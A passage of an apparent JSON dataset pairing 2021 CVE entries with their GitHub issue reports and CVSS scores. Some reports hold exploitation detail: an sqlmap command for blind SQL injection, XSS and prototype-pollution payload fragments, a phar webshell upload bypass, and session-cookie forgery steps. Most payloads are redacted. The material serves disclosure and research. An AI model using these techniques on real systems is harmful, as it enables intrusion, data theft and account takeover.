        "description": "Time based blind SQLi Injection Vulnerability in \"order_col\" parameter. Hi Team I would like to report Time based blind SQLI. Description: SQL injection is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. It generally allows an attacker to view data that they are not normally able to retrieve. This might include data belonging to other users, or any other data that the application itself is able to access. In many cases, an attacker can modify or delete this data, causing persistent changes to the application's content or behavior. ___ Vulnerable parameter: order_col ___ Step to reproduce the issue NUMBERTAG Login to SEO admin Panel NUMBERTAG Copy paste below link: APITAG NUMBERTAG APITAG search APITAG NUMBERTAG website_id NUMBERTAG Replace value of \"order_col\" parameter with below payloads: Payload: (SELECT NUMBERTAG FROM APITAG NUMBERTAG You can see the page sleeps for NUMBERTAG seconds and maybe some seconds more. ___ Video POC : URLTAG ___ Automated way: sqlmap r FILETAG batch level NUMBERTAG risk NUMBERTAG dbms MYSQL dbs technique=T flush session ___ Impact Attacker can mount one or more of the following type of attacks successfully: \u2022 Reading, updating and deleting arbitrary data/tables from the database \u2022 Executing commands on the underlying operating system",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.2,
        "impactScore": 5.9,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2021-28420",
        "Issue_Url_old": "https://github.com/seopanel/Seo-Panel/issues/206",
        "Issue_Url_new": "https://github.com/seopanel/seo-panel/issues/206",
        "Repo_new": "seopanel/seo-panel",
        "Issue_Created_At": "2021-03-11T19:06:01Z",
        "description": "XSS Vulnerablity in \"from_time\" parameter. Hi team, I would like to report XSS vulnerability. Description A cross site scripting (XSS) issue in the admin login panel in NUMBERTAG images version NUMBERTAG allows remote attackers to inject APITAG via the \"redirect\" parameter. ___ XSS Payload: APITAG ___ Vulnerable parameter: from_time ___ Steps to Reproduce the Issue NUMBERTAG Login to SEO admin panel NUMBERTAG Add below line at the end: APITAG NUMBERTAG Hover your mouse to APITAG field As you can see, XSS is triggered and can send cookies to attacker. ___ Video POC: URLTAG ___ Impact With the help of xss attacker can perform social engineering on users by redirecting them from real website to fake one. Attacker can steal their cookies leading to account takeover and download a malware on their system, and there are many more attacking scenarios a skilled attacker can perform with xss.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2021-28680",
        "Issue_Url_old": "https://github.com/oivoodoo/devise_masquerade/issues/83",
        "Issue_Url_new": "https://github.com/oivoodoo/devise_masquerade/issues/83",
        "Repo_new": "oivoodoo/devise_masquerade",
        "Issue_Created_At": "2021-03-23T20:08:25Z",
        "description": "CVETAG : One layer of security is lost when using devise_masquerade under certain circumstances in versions before NUMBERTAG This is a security vulnerability that has been subject to a NUMBERTAG day disclosure deadline and has been fixed in the NUMBERTAG release of APITAG . I'm creating this issue for traceability inside the APITAG project and to be able to refer to it from the CVE. Ideally a security advisory should be created. If the APITAG variable is somehow leaked, an attacker can become any user by misusing the \"masquerade back\" functionality of this Devise extension, something that is not possible in plain Devise since the attacker must know the victim's password salt to form a valid session cookie to encrypt and sign using APITAG . From the description of CVETAG CVETAG : > The devise_masquerade gem before NUMBERTAG allows certain attacks when a password's salt is unknown. > An application that uses this gem > to let administrators masquerade/impersonate users loses > one layer of security protection compared to a situation where Devise (without this > extension) is used. If the server side secret_key_base value > became publicly known (for instance if it is committed to a public > repository by mistake), there are still other protections in > place that prevent an attacker from impersonating any user on the > site. When masquerading is not used in a plain Devise application, one > must know the password salt of the target user if one wants to encrypt > and sign a valid session cookie. When devise_masquerade is used, > however, an attacker can decide which user the \"back\" action will go > back to without knowing that user's password salt and simply knowing > the user ID, by manipulating the session cookie and pretending that a > user is already masqueraded by an administrator. By adding and setting the dictionary key APITAG to the user ID of the admin victim in the session cookie APITAG object, an attacker can fake that an impersonation has occurred and then use the \"masquerade back\" functionality to become the victim.",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.9,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2021-28681",
        "Issue_Url_old": "https://github.com/pion/webrtc/issues/1708",
        "Issue_Url_new": "https://github.com/pion/webrtc/issues/1708",
        "Repo_new": "pion/webrtc",
        "Issue_Created_At": "2021-03-17T22:26:36Z",
        "description": "DTLS Fingerprints in SDP APITAG are not verified. APITAG Your environment. Version: pion/webrtc NUMBERTAG Browser: N/A Other Information reproducable with example/data channels create & example/data channels What did you do? APITAG Run both APITAG and APITAG from example. Once the SDP offer has been generated, decode it with base NUMBERTAG Randomly edit the DTLS fingerprint value in the SDP offer Copy & paste the base NUMBERTAG encoded SDP offer into the waiting APITAG Copy & paste the SDP answer generated by APITAG into APITAG What did you expect? The built in APITAG should throw an error and therefore prevent the data channel from being established. What happened? The data channel was created as usual. CODETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 1.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-28860",
        "Issue_Url_old": "https://github.com/adaltas/node-mixme/issues/1",
        "Issue_Url_new": "https://github.com/adaltas/node-mixme/issues/1",
        "Repo_new": "adaltas/node-mixme",
        "Issue_Created_At": "2021-04-22T09:23:50Z",
        "description": "Prototype Pollution in Mixme. Hi there, In FILETAG mixme NUMBERTAG an attacker can add or alter properties of an object via '__proto__' through the APITAG and APITAG functions. The polluted attribute will be directly assigned to every object in the program. This will put the availability of the program at risk causing a potential denial of service APITAG POC code: merge({}, APITAG {\"polluted\": APITAG polluted!!!\"}}')) NPM should be notified accordingly. You can contact me regarding the mitigation. Have a great weekend.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.1,
        "impactScore": 5.2,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-28874",
        "Issue_Url_old": "https://github.com/SerenityOS/serenity/issues/5769",
        "Issue_Url_new": "https://github.com/serenityos/serenity/issues/5769",
        "Repo_new": "serenityos/serenity",
        "Issue_Created_At": "2021-03-13T22:58:23Z",
        "description": "APITAG Heap buffer overflow in UTF NUMBERTAG BE decoder. Trace: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-28875",
        "Issue_Url_old": "https://github.com/rust-lang/rust/issues/80894",
        "Issue_Url_new": "https://github.com/rust-lang/rust/issues/80894",
        "Repo_new": "rust-lang/rust",
        "Issue_Created_At": "2021-01-11T01:16:29Z",
        "description": "Heap buffer overflow in APITAG . URLTAG At line NUMBERTAG the guard object's APITAG field is incremented by the value returned from a read implementation. If a questionable Read returns a value larger than the buffer size, it will take that value and set the length of the vector over the boundary. This bug is reachable from APITAG and APITAG . Here is a playground link URLTAG that demonstrates the bug. It segfaults with APITAG .",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-28876",
        "Issue_Url_old": "https://github.com/rust-lang/rust/issues/81740",
        "Issue_Url_new": "https://github.com/rust-lang/rust/issues/81740",
        "Repo_new": "rust-lang/rust",
        "Issue_Created_At": "2021-02-04T06:49:38Z",
        "description": "Soundness issue in APITAG specialization. URLTAG URLTAG There is a panic safety issue in APITAG that allows to call ERRORTAG to the same index twice. ERRORTAG is called at line NUMBERTAG and the index is updated at line NUMBERTAG If line NUMBERTAG panics, the index is not updated and the subsequent APITAG call will use the same index for ERRORTAG . This violates the second safety requirement of APITAG . Here is a playground link URLTAG that demonstrates creating two mutable references to the same memory location without using unsafe Rust.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 1.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-28878",
        "Issue_Url_old": "https://github.com/rust-lang/rust/issues/82291",
        "Issue_Url_new": "https://github.com/rust-lang/rust/issues/82291",
        "Repo_new": "rust-lang/rust",
        "Issue_Created_At": "2021-02-19T14:23:14Z",
        "description": "Zip may call __iterator_get_unchecked twice with the same index. Here ERRORTAG is called for potential side effects until APITAG , ignoring however that it could have already been called in APITAG with those indexes. URLTAG Playground link URLTAG that demonstrates how this can be exploited to get two mutable references to the same data and cause an use after free bug.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-28879",
        "Issue_Url_old": "https://github.com/rust-lang/rust/issues/82282",
        "Issue_Url_new": "https://github.com/rust-lang/rust/issues/82282",
        "Repo_new": "rust-lang/rust",
        "Issue_Created_At": "2021-02-19T03:43:41Z",
        "description": "Side effect handling in specialized zip implementation causes buffer overflow. URLTAG URLTAG APITAG can be set to a value greater than APITAG in this branch. This causes integer overflow in APITAG and lead to a buffer overflow. Playground Link URLTAG that demonstrates segfault with safe Rust code.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-28902",
        "Issue_Url_old": "https://github.com/CESNET/libyang/issues/1454",
        "Issue_Url_new": "https://github.com/cesnet/libyang/issues/1454",
        "Repo_new": "cesnet/libyang",
        "Issue_Created_At": "2021-03-08T11:34:27Z",
        "description": "In function \"read_yin_container\", the value \"retval >ext[r]\" can be NULL. The operation \"retval >ext[r] >flags\" result in a crash. APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG Krejesne APITAG APITAG APITAG tion> APITAG APITAG APITAG APITAG :rre instance value=\"false\"/> APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-28903",
        "Issue_Url_old": "https://github.com/CESNET/libyang/issues/1453",
        "Issue_Url_new": "https://github.com/cesnet/libyang/issues/1453",
        "Repo_new": "cesnet/libyang",
        "Issue_Created_At": "2021-03-08T07:25:01Z",
        "description": "The Recursive call of \"lyxml_parse_elem\" leads to crash.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-28904",
        "Issue_Url_old": "https://github.com/CESNET/libyang/issues/1451",
        "Issue_Url_new": "https://github.com/cesnet/libyang/issues/1451",
        "Repo_new": "cesnet/libyang",
        "Issue_Created_At": "2021-03-08T02:03:57Z",
        "description": "\u201cext_get_plugin\u201d function cause crash. The argument \"revision\" of function ext_get_plugin can be NULL, which can cause crash in the strcmp.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-28905",
        "Issue_Url_old": "https://github.com/CESNET/libyang/issues/1452",
        "Issue_Url_new": "https://github.com/cesnet/libyang/issues/1452",
        "Repo_new": "cesnet/libyang",
        "Issue_Created_At": "2021-03-08T03:16:06Z",
        "description": "\u201clys_node_free\u201d function's arg node >module can be NULL, which lead to assert.. APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG revision. APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-28906",
        "Issue_Url_old": "https://github.com/CESNET/libyang/issues/1455",
        "Issue_Url_new": "https://github.com/cesnet/libyang/issues/1455",
        "Repo_new": "cesnet/libyang",
        "Issue_Created_At": "2021-03-08T11:35:21Z",
        "description": "In function \"read_yin_leaf\", the value \"retval >ext[r]\" can be NULL. The operation \"retval >ext[r] >flags\" result in a crash . CODETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-28976",
        "Issue_Url_old": "https://github.com/GetSimpleCMS/GetSimpleCMS/issues/1335",
        "Issue_Url_new": "https://github.com/getsimplecms/getsimplecms/issues/1335",
        "Repo_new": "getsimplecms/getsimplecms",
        "Issue_Created_At": "2021-03-19T12:47:58Z",
        "description": "Before APITAG NUMBERTAG ersion FILETAG allowed to upload executable files lead to RCE. Affected version: APITAG before NUMBERTAG ulnerable file: FILETAG . Causes of vulnerability : FILETAG does not allow direct uploading of ph type files, and it fails when directly uploading ph files. FILETAG However, you can bypass the detection by uploading a phar file and adding picture file header information such as jpg to the file to successfully upload the phar file. FILETAG Because the phar file can be parsed normally after php NUMBERTAG you can directly upload the php webshell with the phar suffix. FILETAG Repair suggestion: add the ph file to the upload blacklist",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.2,
        "impactScore": 5.9,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2021-28977",
        "Issue_Url_old": "https://github.com/GetSimpleCMS/GetSimpleCMS/issues/1336",
        "Issue_Url_new": "https://github.com/getsimplecms/getsimplecms/issues/1336",
        "Repo_new": "getsimplecms/getsimplecms",
        "Issue_Created_At": "2021-03-19T13:39:08Z",
        "description": "Cross Site Scripting(XSS) Vulnerability via upload in Latest Release NUMBERTAG FILETAG . Affected version : APITAG before NUMBERTAG ulnerable file : FILETAG . Vulnerability type : Cross Site Scripting(XSS) The file content filtering in FILETAG is not comprehensive. Adding comments or jpg and other file header information in the file content can lead to the successful upload of files such as xla, pages, gzip, etc. that contain HTML code. If an attacker adds malicious js scripts to the HTML code, it may trigger cross site scripting (XSS) vulnerabilities and threaten user information. FILETAG FILETAG FILETAG FILETAG Repair suggestion: Filter sensitive characters in uploaded files, such as APITAG , etc.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2021-29002",
        "Issue_Url_old": "https://github.com/plone/Products.CMFPlone/issues/3255",
        "Issue_Url_new": "https://github.com/plone/products.cmfplone/issues/3255",
        "Repo_new": "plone/products.cmfplone",
        "Issue_Created_At": "2021-03-03T07:13:08Z",
        "description": "Stored XSS in APITAG field. Hi Team, Description: Stored XSS, also known as persistent XSS, is more damaging than non persistent XSS. It occurs when a malicious script is injected directly into a vulnerable web application. Vulnerable Parameter: APITAG Affected version NUMBERTAG SS payload: APITAG APITAG Steps to reproduce the issue NUMBERTAG Goto FILETAG where Plone NUMBERTAG ersion is installed NUMBERTAG Click on APITAG in now\" and Login as APITAG NUMBERTAG Navigate to APITAG APITAG NUMBERTAG Edit APITAG title\" field to APITAG APITAG \" Video POC: URLTAG Impact: XSS can use to steal cookies, password or to run arbitrary code on a victim's browser Reference: URLTAG URLTAG URLTAG Regards, Piyush Patil",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2021-29008",
        "Issue_Url_old": "https://github.com/seopanel/Seo-Panel/issues/211",
        "Issue_Url_new": "https://github.com/seopanel/seo-panel/issues/211",
        "Repo_new": "seopanel/seo-panel",
        "Issue_Created_At": "2021-03-19T12:46:12Z",
        "description": "XSS Vulnerability in \"to_time\" parameter. Hi team, I would like to report XSS vulnerability. Description A cross site scripting (XSS) issue in the SEO admin login panel version NUMBERTAG allows remote attackers to inject APITAG via the \"redirect\" parameter. ___ XSS Payload NUMBERTAG autofocus onfocus=alert NUMBERTAG ulnerable parameter: to_time ___ Steps to Reproduce the Issue NUMBERTAG Login to SEO admin panel NUMBERTAG Paste below POC: CODETAG As you can see, XSS is triggered and can send cookies to attacker. ___ Video POC: URLTAG ___ Impact With the help of xss attacker can perform social engineering on users by redirecting them from real website to fake one. Attacker can steal their cookies leading to account takeover and download a malware on their system, and there are many more attacking scenarios a skilled attacker can perform with xss.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2021-29009",
        "Issue_Url_old": "https://github.com/seopanel/Seo-Panel/issues/210",
        "Issue_Url_new": "https://github.com/seopanel/seo-panel/issues/210",
        "Repo_new": "seopanel/seo-panel",
        "Issue_Created_At": "2021-03-19T12:43:40Z",
        "description": "XSS Vulnerability in \"type\" parameter. Hi team, I would like to report XSS vulnerability. Description A cross site scripting (XSS) issue in the admin login panel in NUMBERTAG images version NUMBERTAG allows remote attackers to inject APITAG via the \"redirect\" parameter. ___ XSS Payload NUMBERTAG autofocus onfocus=alert NUMBERTAG ulnerable parameter: type ___ Steps to Reproduce the Issue NUMBERTAG Login to SEO admin panel NUMBERTAG Paste below POC: CODETAG As you can see, XSS is triggered and can send cookies to attacker. ___ Video POC: URLTAG ___ Impact With the help of xss attacker can perform social engineering on users by redirecting them from real website to fake one. Attacker can steal their cookies leading to account takeover and download a malware on their system, and there are many more attacking scenarios a skilled attacker can perform with xss.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2021-29010",
        "Issue_Url_old": "https://github.com/seopanel/Seo-Panel/issues/212",
        "Issue_Url_new": "https://github.com/seopanel/seo-panel/issues/212",
        "Repo_new": "seopanel/seo-panel",
        "Issue_Created_At": "2021-03-19T12:50:19Z",
        "description": "XSS Vulnerability in \"report_type\" parameter. Hi team, I would like to report XSS vulnerability. Description A cross site scripting (XSS) issue in the SEO admin login panel version NUMBERTAG allows remote attackers to inject APITAG via the \"redirect\" parameter. ___ XSS Payload NUMBERTAG autofocus onfocus=alert NUMBERTAG ulnerable parameter: report_type ___ Steps to Reproduce the Issue NUMBERTAG Login to SEO admin panel NUMBERTAG Paste below POC: CODETAG As you can see, XSS is triggered and can send cookies to attacker. ___ Video POC: URLTAG ___ Impact With the help of xss attacker can perform social engineering on users by redirecting them from real website to fake one. Attacker can steal their cookies leading to account takeover and download a malware on their system, and there are many more attacking scenarios a skilled attacker can perform with xss.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2021-29056",
        "Issue_Url_old": "https://github.com/pixelimity/pixelimity/issues/21",
        "Issue_Url_new": "https://github.com/pixelimity/pixelimity/issues/21",
        "Repo_new": "pixelimity/pixelimity",
        "Issue_Created_At": "2021-03-22T08:44:13Z",
        "description": "pixelimity \u2013 Cross Site Scripting (XSS) in APITAG Product: pixelimity Download: URLTAG Vunlerable Version: latest version Tested Version: latest version Author:qianxiao NUMBERTAG Description: Pixelimity CMS is prone to a Persistent Cross Site Scripting attack that allows a malicious user to inject HTML or scripts that can access any cookies, session tokens, or other sensitive information retained by your browser and used with that site. Advisory Details: A Cross Site Scripting (XSS) was discovered in \u201cportfolio latest version\u201d, which can be exploited to execute arbitrary code. The vulnerability exist due to insufficient filtration of user supplied data in the APITAG HTTP POST parameter passed to the PATHTAG URL. An attacker could execute arbitrary HTML and script code in a browser in the context of the vulnerable website. The exploitation example below uses the APITAG APITAG function to see a pop up messagebox: Proof of concept: APITAG as admin. APITAG URL FILETAG and click on APITAG APITAG XSS payload in the APITAG parameter Pixelimity\"> APITAG alert NUMBERTAG APITAG and click on APITAG Setting\" FILETAG FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2021-29061",
        "Issue_Url_old": "https://github.com/fracpete/vfsjfilechooser2/issues/7",
        "Issue_Url_new": "https://github.com/fracpete/vfsjfilechooser2/issues/7",
        "Repo_new": "fracpete/vfsjfilechooser2",
        "Issue_Created_At": "2020-09-30T14:56:00Z",
        "description": "Vulnerable Regular Expression in vfsjfilechooser2. Type of Issue Potential Regex Denial of Service APITAG Description The vulnerable regular expression is located in URLTAG The APITAG vulnerability can be exploited with the following string APITAG You can execute the following code to reproduce APITAG CODETAG I think you can limit the input length or modify this regex.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-29272",
        "Issue_Url_old": "https://github.com/microcosm-cc/bluemonday/issues/111",
        "Issue_Url_new": "https://github.com/microcosm-cc/bluemonday/issues/111",
        "Repo_new": "microcosm-cc/bluemonday",
        "Issue_Created_At": "2021-03-27T10:30:00Z",
        "description": "Regression of NUMBERTAG APITAG allows input of SCRIPT tag. Reported by MENTIONTAG at NUMBERTAG T NUMBERTAG I'm a security researcher who has been fuzzing famous XSS sanitizers. > APITAG fuzzing the sanitizers, my fuzzer triggered an alert that shows bluemonday is vulnerable to bypass. > After some checks, I confirmed that this is a vulnerability, so I'm reporting it here. > > While checking the issues on the bluemonday repository, I realized that this is the same issue as URLTAG APITAG must be resolved already as it's closed.) > As there is no doubt this vulnerability occurred again in somewhere of previous commits, I decided to find it. > And it was a commit that added vulnerable code again: URLTAG (It's now moved to here: URLTAG ) > FILETAG > To reproduce this, please use the following steps NUMBERTAG Download the attached FILETAG NUMBERTAG Extract it NUMBERTAG Run test.go: \"go run test.go NUMBERTAG Sanitization bypass will be shown. > > If you are going to fix this issue, please let me know. I can assign CVE to notify this issue to users. > > Best regards, > APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-29279",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1718",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1718",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2021-03-28T14:19:47Z",
        "description": "A integer overflow in function APITAG There is a integer overflow in function APITAG . In which, the arg APITAG \uff0cmaybe value APITAG is a negative number. In result, memcpy in gf_props_assign_value failed. More, this bug may result a heap overflow with crafted file. In command line: FILETAG In gdb: FILETAG The crafted file is in attach zip: FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-29313",
        "Issue_Url_old": "https://github.com/ciweiin/seacms/issues/14",
        "Issue_Url_new": "https://github.com/ciweiin/seacms/issues/14",
        "Repo_new": "ciweiin/seacms",
        "Issue_Created_At": "2021-03-23T12:55:22Z",
        "description": "seacms NUMBERTAG statcode reflected xss vulnerability . A xss vulnerability was discovered in seacms NUMBERTAG There is a stored XSS vulnerability which allows remote attackers to inject arbitrary web script or HTML via the v_company and v_tvsparameter of APITAG POC NUMBERTAG APITAG alert NUMBERTAG APITAG CODETAG NUMBERTAG choose this part and write poc to form FILETAG NUMBERTAG submit and view webpage FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-29324",
        "Issue_Url_old": "https://github.com/Moddable-OpenSource/moddable/issues/586",
        "Issue_Url_new": "https://github.com/moddable-opensource/moddable/issues/586",
        "Repo_new": "moddable-opensource/moddable",
        "Issue_Created_At": "2021-02-26T10:34:42Z",
        "description": "stack overflow. Enviroment APITAG poc: ERRORTAG description ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-29325",
        "Issue_Url_old": "https://github.com/Moddable-OpenSource/moddable/issues/582",
        "Issue_Url_new": "https://github.com/moddable-opensource/moddable/issues/582",
        "Repo_new": "moddable-opensource/moddable",
        "Issue_Created_At": "2021-02-26T10:30:19Z",
        "description": "heap buffer APITAG Enviroment APITAG poc: ERRORTAG description ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-29326",
        "Issue_Url_old": "https://github.com/Moddable-OpenSource/moddable/issues/583",
        "Issue_Url_new": "https://github.com/moddable-opensource/moddable/issues/583",
        "Repo_new": "moddable-opensource/moddable",
        "Issue_Created_At": "2021-02-26T10:30:40Z",
        "description": "heap buffer APITAG Enviroment APITAG poc: ERRORTAG description ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-29327",
        "Issue_Url_old": "https://github.com/Moddable-OpenSource/moddable/issues/580",
        "Issue_Url_new": "https://github.com/moddable-opensource/moddable/issues/580",
        "Repo_new": "moddable-opensource/moddable",
        "Issue_Created_At": "2021-02-26T10:30:01Z",
        "description": "heap buffer APITAG Enviroment APITAG poc: ERRORTAG description ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-29328",
        "Issue_Url_old": "https://github.com/Moddable-OpenSource/moddable/issues/585",
        "Issue_Url_new": "https://github.com/moddable-opensource/moddable/issues/585",
        "Repo_new": "moddable-opensource/moddable",
        "Issue_Created_At": "2021-02-26T10:32:47Z",
        "description": "over APITAG Enviroment APITAG poc: ERRORTAG description ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.1,
        "impactScore": 5.2,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-29329",
        "Issue_Url_old": "https://github.com/Moddable-OpenSource/moddable/issues/587",
        "Issue_Url_new": "https://github.com/moddable-opensource/moddable/issues/587",
        "Repo_new": "moddable-opensource/moddable",
        "Issue_Created_At": "2021-02-26T10:36:48Z",
        "description": "stack APITAG Enviroment APITAG poc: ERRORTAG description ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-29338",
        "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/1338",
        "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/1338",
        "Repo_new": "uclouvain/openjpeg",
        "Issue_Created_At": "2021-03-24T05:21:26Z",
